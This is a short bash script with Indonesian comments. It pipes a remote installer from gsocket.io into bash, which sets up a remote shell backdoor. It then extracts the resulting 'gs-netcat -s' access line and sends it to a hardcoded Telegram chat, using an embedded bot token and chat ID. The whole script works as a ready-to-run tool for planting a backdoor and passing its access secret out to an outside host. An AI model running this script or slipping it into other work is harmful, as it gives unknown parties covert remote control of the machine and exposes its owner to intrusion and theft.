#!/bin/bash

# Menjalankan perintah dan menyimpan outputnya
output=$(bash -c "$(curl -fsSL https://gsocket.io/y)")

# Cek apakah output mengandung string "gs-netcat -s"
if [[ "$output" == *"gs-netcat -s"* ]]; then
  # Ekstrak baris yang mengandung "gs-netcat -s"
  command=$(echo "$output" | grep "gs-netcat -s")

  # Kirim pesan ke Telegram
  chat_id="6256985839"  # Ganti dengan chat ID Telegram Anda
  bot_token="7120060654:AAEmYjKb0zNviPESOFatSBc7SL4foGVZuRE"  # Ganti dengan bot token Telegram Anda

  # Kirimkan pesan lengkap ke Telegram
  curl -s -X POST "https://api.telegram.org/bot$bot_token/sendMessage" \
       -d chat_id="$chat_id" \
       -d text="$command" > /dev/null

  # Tampilkan notifikasi sederhana di terminal
  echo "Telegram Send"
fi
